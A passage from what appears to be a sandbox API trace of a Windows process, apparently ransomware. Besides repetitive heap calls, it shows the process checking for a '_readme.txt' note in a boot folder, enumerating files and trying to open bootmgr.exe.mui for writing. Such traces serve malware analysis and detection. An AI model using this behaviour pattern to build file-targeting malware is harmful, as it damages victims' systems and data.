RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.244] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0058.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.244] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.245] PathFindFileNameW (pszPath="") returned="" [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.245] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.245] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.245] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.245] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0058.245] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0058.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.245] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.246] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.246] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0058.246] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.246] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned=".txt" [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.246] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.246] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.246] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] 